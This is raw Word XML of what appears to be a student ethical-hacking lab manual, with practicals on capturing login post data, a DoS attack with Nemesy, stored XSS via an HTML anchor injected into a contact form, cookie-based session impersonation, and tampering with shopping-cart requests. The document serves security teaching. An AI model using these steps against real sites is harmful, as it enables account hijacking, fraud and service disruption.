        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="008577E0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 10: Find the post methods for username and passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514196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010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="445" name="image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22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Pr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="166"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 11: U will see the email- id and password that you used to log in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="25142067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176</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5975000" cy="994410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="447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223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0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00" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005A7397" w:rsidRDefault="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>2) Denial of Service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) Attack: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7397" w:rsidRDefault="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    a) Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nemesy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to launch a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack against a target system or network. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7397" w:rsidRPr="00D4195F" w:rsidRDefault="005A7397">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    b) Observe the impact of the attack on the target's availability and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D569E9" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9" w:rsidP="00D569E9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 w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D569E9" w:rsidRPr="00D4195F" w:rsidRDefault="00DD0B93" w:rsidP="00D569E9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221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2043264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121139</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="0"/>
                <wp:effectExtent l="0" t="0" r="19685" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="188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3A3A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71597" id=" 95" o:spid="_x0000_s1026" style="position:absolute;z-index:252043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6pt,718.2pt" to="541.55pt,7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" strokecolor="#a3a3a3">
                <o:lock v:ext="edit" shapetype="f"/>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D569E9" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Using NEMESIS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8816"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6337300" cy="2196547"/>
            <wp:effectExtent l="0" t="0" r="635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896" cy="22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E9" w:rsidRPr="00D4195F" w:rsidRDefault="00D569E9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D569E9" w:rsidRPr="00D4195F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1040" w:left="1220" w:header="0" w:footer="731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8577E0" w:rsidRDefault="008577E0" w:rsidP="008577E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="2160" w:right="4258" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t>PRACTICAL NO. 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A7397" w:rsidRPr="00D4195F" w:rsidRDefault="005A7397" w:rsidP="008577E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="2160" w:right="4258" w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE1B96" w:rsidRDefault="008577E0" w:rsidP="00DE1B96">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1B96">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AIM: </w:t>
      </w:r>
      <w:r w:rsidR="00DE1B96" w:rsidRPr="00DE1B96">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Persistent Cross-Site Scripting Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1B96" w:rsidRPr="00DE1B96" w:rsidRDefault="00DE1B96" w:rsidP="00DE1B96">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Set up a vulnerable web application that is susceptible to persistent XSS attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1B96" w:rsidRPr="00DE1B96" w:rsidRDefault="00DE1B96" w:rsidP="00DE1B96">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Craft a malicious script to exploit the XSS vulnerability and execute arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1B96" w:rsidRDefault="00EB1B7C" w:rsidP="00DE1B96">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Observe the consequences of the attack and understand the potential risks associated with XSS vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1B96" w:rsidRDefault="00DE1B96" w:rsidP="00DE1B96">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A6381" w:rsidRPr="007A6381" w:rsidRDefault="007A6381" w:rsidP="00DE1B96">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1- </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6381">
        <w:t>Visit to http://www.techpanda.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1B96" w:rsidRDefault="00DE1B96" w:rsidP="00DE1B96">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE1B96" w:rsidRPr="00DE1B96" w:rsidRDefault="007A6381" w:rsidP="00DE1B96">
      <w:pPr>
        <w:pStyle w:val="BodyText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973445" cy="290195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97" w:rsidRDefault="007A6381" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6381">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter email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hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidRPr="006264D6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
          </w:rPr>
          <w:t>admin@google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password as </w:t>
      </w:r>
      <w:r w:rsidRPr="007A6381">
        <w:t>Password2010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A6381" w:rsidRDefault="007A6381" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A6381" w:rsidRDefault="007A6381" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6330950" cy="2425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81" w:rsidRDefault="007A6381" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A6381" w:rsidRDefault="007A6381" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Click on Add new contact button and fill details as </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A6381" w:rsidRDefault="007A6381" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First name= &lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>=”http://www.mu.ac.in&gt; CS &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6C50" w:rsidRDefault="008E6C50" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Last Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6C50" w:rsidRDefault="008E6C50" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Mobile no</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6C50" w:rsidRDefault="008E6C50" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Email  address</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008E6C50" w:rsidRDefault="008E6C50" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E6C50" w:rsidRDefault="008E6C50" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6330950" cy="2405380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81" w:rsidRPr="007A6381" w:rsidRDefault="007A6381" w:rsidP="007A6381">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4258"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED1477" w:rsidRPr="00D4195F" w:rsidRDefault="00ED1477" w:rsidP="00ED1477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED1477" w:rsidRPr="00D4195F" w:rsidRDefault="00ED1477" w:rsidP="00ED1477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED1477" w:rsidRPr="00D4195F" w:rsidRDefault="00ED1477" w:rsidP="00ED1477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Default="00390B0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Default="007945D0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007945D0" w:rsidRPr="00D4195F" w:rsidRDefault="007945D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E141B2" w:rsidRPr="00D4195F" w:rsidRDefault="00E141B2" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PRACTICAL NO. 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00E141B2" w:rsidP="00E141B2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AIM: </w:t>
      </w:r>
      <w:r w:rsidR="00401CBD" w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Session impersonation using Firefox and Tamper Data add-on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>A] Session Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>STEPS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>FireFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Go to Tools &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Addons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> &gt; Extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Search and install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>EditThisCookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> or Cookie Import/Export or any other Cookie tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00401CBD" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Then Click on Cookie extension to get cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401CBD" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00401CBD">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Open a Website and Login and then click on export cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A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2238375" cy="542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9A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A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2581275" cy="2971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9A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Logout from the webpage once the cookie got exported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459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8F220A" w:rsidRPr="00D4195F" w:rsidRDefault="008F220A" w:rsidP="008F220A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Paste the cookie in the tool which you have exported and click on green tick</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A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4914900" cy="4867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9A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>And you are in</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A1459A" w:rsidRPr="00D4195F" w:rsidRDefault="00A1459A" w:rsidP="00A1459A">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6070600" cy="293878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63221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tamper DATA add-on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>FireFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Go to Tools &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Addons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> &gt; Extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Search and install Temper Data</w:t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t xml:space="preserve">Select a website for tempering data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>razorba</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94E44" w:rsidRPr="00D4195F" w:rsidRDefault="00C94E44" w:rsidP="00363221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5969165" cy="31070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904" cy="31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t>Select any item to but</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t>Then Click to add cart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Then Click on tool for tempering Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221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6016666" cy="314007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179" cy="31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t>Then Start tempering the data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221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2790825" cy="27908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t>Here you go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00363221" w:rsidRPr="00D4195F" w:rsidRDefault="00363221" w:rsidP="00363221">
      <w:pPr>
